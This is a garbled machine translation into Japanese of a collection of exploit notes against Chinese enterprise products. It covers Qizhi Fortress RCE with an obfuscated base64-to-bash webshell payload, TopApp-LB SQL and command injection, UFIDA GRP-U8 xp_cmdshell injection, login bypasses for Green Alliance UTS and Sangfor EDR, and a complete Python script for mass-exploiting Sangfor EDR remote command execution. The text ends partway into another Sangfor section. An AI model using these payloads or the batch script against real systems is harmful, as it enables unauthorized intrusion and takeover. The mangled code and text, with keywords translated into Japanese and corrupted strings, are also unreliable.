.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
1。Qizhi Fortress(CNVD-2019-20835)の前でのリモートコマンド実行の脆弱性1。http://10.20.10.11にアクセス/リスナー/cluster_manage.php :返品「OK」。 (許可されていない、ログインは必要ありません)2。GetShellへの次のリンクをご覧ください。実行が成功した後、1つの文でPHPを生成3https://10.20.10.10/ha_request.php?action=installipaddr=10.20.10.11node_id=1 $ {ifs} | `echo $ {ifs} ' ZWNOBYANPD9WAHAGQGV2YWOJF9SRVFVRVNUWZEWMDG2XSK7PZ7PZ4NPJ4VDMFYL3D3D3D3D3D3D3D3D3D3D3D3D3D3D3D3D3VYY2VZL3FYY29KZSS9SYMO3NY5WHAK} { d | bash` | $ {ifs} | echo $ {ifs} 3.getShellアクセスpath:/var/www/shtere/resources/qrcode/lbj77.php 3https://10.20.10.10/shterm/resources/qrcode/lbj77.php(pishaud :
post /shterm/listener/tui_update.php
a=['t'; import os; os.popen( 'whoami')# ']
2。TIANRONGXINTOPAPP-LB LOAD BALANCING SYSTAM SQL INDECTIONの脆弱性
1.USE POC:POST /ACC/CLSF/REPORT/DATASOURCE.PHP HTTP/1.1HOST: LocalHostConnection: CloseAccept: Text/JavaScript、Text/HTML、Application/XML、Text/Xml Mac OS X 10_15_5)AppleWebkit/537.36(Khtml、geckoのように)Chrome/84.0.4147.105 Safari/537.36Accept-Language: Zh-Cn、Zh; Q=0.9Content-Type: Application/x-www-form-urlencodedt=le=0s=tl=1vid=1+select 1,2,3,4,5,6,7,8,9、Substr( 'a'、1,1)、11,12,13,14,15,16,17,18,19,20,21,22-+gid=0l mt=10o=r_speedasc=falsep=8lipf=lipt=ripf=ript=dscp=dscp=lpf=lpt=rpf=rpt=rpt=@。
2.2歴史的な抜け穴はまだ再現できます。
https://www.uedbox.com/post/21626/
ユーザー名とパスワード: ID(TianRongxinロードバランシングTopapp-LBシステムは、パスワードなしで直接ログインします)
https://www.uedbox.com/post/22193/username : ping 9928e5.dnslog.info;エコーパスワード:
3。UFIDAGRP-U8注射
poc:post/proxy http/1.1content-type:アプリケーション/x-www-form-urlencodeduser-agent: mozilla/4.0(互換; msie 6.0;)host: localhostcontent-lengtent-length-length-length-lengther-connefy3360 Keep-Alivecache-Control: No-Cachecver=9.8.0DP=?XMLバージョン='1.0'エンコード='GB2312'?r9Packetバージョン='1'DataFormatxml/dataFormatr9FunctionNameas_Datarequest Format='Text'DataSetProviderData/data/paramnamedAta/namedata format=' text'exec xp_cmdshell 'whoami'/data/param/params/r9function/r9packet 
4。GreenAlliance UTS包括的な脅威プローブ管理者が自由にログインします
論理的脆弱性、使用方法のリファレンス:https://www.hackbug.net/archives/112.html
1。Loginパケットを変更する{'Status':False、' mag ': ''} - {'status':true、' mag ': ''}
2。
3.もう一度ログインして、前のデータパケットでパスワードMD5パスワードを置き換えます
4.正常にログインします
脆弱性実際のケース:
応答パッケージを変更します。 falseをtrueに変更する場合、管理者ユーザーのMD5値パスワードをリークすることができます
チャネルのMD5値を使用して、MD5値にログインするためにチャネルのMD5値を使用して、MD5値をページにログインします。
7AC301836522B54AFCBBED714534C7FB 
5。
ログイン許可は必要ありません。元のパスワードはパスワードの変更で確認されていないため、 /?モジュール=auth_useraction=mod_edit_pwdであるため、インターフェイスはアクセスする権限があり、ユーザーのパスワードが直接変更されます。デフォルトのスーパーマンアカウントUIDは1です
post /?module=auth_useraction=mod_edit_pwd
Cookie: username=superman;
uid=1pd=newPassWDMOD_PWD=1DLP_PERM=1
6。WPSオフィス画像解析エラーはヒープの損傷を引き起こし、コードが実行されます
それはように見えます(それを忘れて理解できません.搾取は奉仕の拒否につながる可能性があります。
関連するリファレンス:
http://Zeifan.my/security/rce/heap/2020/09/03/wps-rce-heap.html
7。 Sangforターミナル検出と応答プラットフォーム - 任意のユーザーログイン
FOFA指紋:title='Sangforターミナル検出応答プラットフォーム'
脆弱性のエクスプロイト:
ペイロード:
https://IP/ui/login.php?user=ログインする必要があるユーザー名は次のようにリストされています。
https://1.1.1.1.1:1980/ui/login.php?user=adminは、クエリが完了した後、プラットフォームにログインできます。
8。特定のEDR脆弱性- ペイロードを含む
1。脆弱性の搾取方法:
https://xxx.xxx.xxx/tool/log/c.php?strip_slashes=systemhost=whoami 
2。バッチ利用方法
バッチ利用方法は、次のようにオンラインでリリースされました:https://github.com/a2gel/sangfor-edr-exploit
# - * - coding: utf-8-* -
#@time : 2020/8/17
#@author :エンジェル
#@file : edr.py
#実行されたコマンドのコードを提供していただきありがとうございます
リクエストをインポートします
Reをインポートします
urllib3をインポートします
sysをインポートします
base64をインポートします
urllib3.disable_warnings(urllib3.exceptions.insecurerequestwarning)
def hello():
'' '
init関数
:RETURN: initプリント
'' '
印刷(
'' sangfor edrリモートコマンドコードエクスプロイト
エンジェル20200817
github: https://github.com/a2gel/sangfor-edr-exploit
command: python edr.py url http://10.10.10.0/
command: python edr.pyファイル1.txt hoami '' ')
def readfile(filename):
'' '
行ごとにファイルのコンテンツを読んで、リストに戻ります
:PARAM FILENAME: FILENAME
:RETURN3:ラインごとの分割ファイルコンテンツ
'' '
リスト=[]
キーワード=open( './'+ filename、' r ')
line=keywords.readline()。ストリップ( '\ n')
while(line):
list.append(line)
line=keywords.readline()。ストリップ( '\ n')
keywords.close()
返品リスト
def log(name、value):
'' '
行ごとにファイルを書き込みます
:param name3:ファイル名
:Param Value3:ファイルコンテンツ
:Return:空
'' '
save=file(str(name)+'。txt'、 'a+')
save.write(str(value)+'\ n')
save.close()
def rce(host、command):
'' '
リモートコマンド実行コア関数
:PARAM HOST: URL情報
:Param Command:コマンドが実行されました
:RETURN:正常に実行されたreturnコマンドエコー失敗した印刷の失敗
'' '
ヘッダー={
'Connection ':' close '、
'cache-control':' max-age=0 '、
'アップグレード-Insecure-Requests':' 1 '、
'user-agent':' mozilla/5.0(windows nt 10.0; win64; x64)applewebkit/537.36(khtml、geckoのような)chrome/84.0.4147.125 safari/537.36 '、
'Accept':' text/html、application/xhtml+xml、application/xml; q=0.9、image/webp、image/apng、*/*; q=0.8、application/signed-exchange; v=b3; q=0.9 '、
'sec-fetch-site':' none '、
'sec-fetch-mode':'ナビゲート '、
'sec-fetch-user':'?1 '、
'sec-fetch-dest':'ドキュメント '、
'Accept-Encoding':' gzip、deflate '、
'Accept-language':' zh-cn、zh; q=0.9 '
}
command=base64.b64encode(command)
command='echo \' '+command+' \ ''+'| base64 -d | bash'
command=command.replace( ''、 '$ ifs')
url='{}/tool/log/c.php?strip_slashes=systemhost={}'。形式(host、command)
#print url
try:
response=requests.get(url、verify=false、headers=headers)
respons.raise_for_status()
Response.Encoding='UTF-8'
#print Response.text
res=re.findall(r'blogヘルパー/b/p(。+?)preform '、respons.text、re.s)
Response.close()
印刷(res [0])
'+'を返します
:を除く
print( 'failed')
戻る '-'
__name__=='__main __' :の場合
Len(Sys.Argv)2:の場合
こんにちは()
else:
sys.Argv [1]=='url':の場合
1:
command=raw_input( 'command')
command:の場合
print( 'try%s'%sys.argv [2])
rce(sys.argv [2]、コマンド)
else:
print( '入力コマンドを入力してください')
command=''
elif sys.argv [1]=='file':
if(sys.argv)3:
印刷'command: python edr.py file url.txt'
else:
readfile(sys.argv [2]):のiの場合
print( 'try%s'%i)
rce(i、sys.argv [3])=='+' :の場合
log( 'success'、sys.argv [3])
else:
log( 'error'、sys.argv [3])
else:
こんにちは()
3.単一のURLを使用します
Python edr.py URL http://10.10.10.10
hoamiを指揮します
http://10.10.10.10をお試しください
根
バルクURLは、ディレクトリにxxx.txt line 1つのURLを作成する必要があります
python edr.pyファイル1.txt hoami
try: http://10.10.10.10
根
try: http://10.10.10.11
root9。 Sangfor EDR RCE脆弱性1。脆弱性原則:
dev_linkage_launch.phpは、デバイスリンケージの新しいエントリポイントです。主に、リンクされたインターフェイスを統一されたビジネス処理のためのインターフェイスに構築します。
メインコール
フォローアップ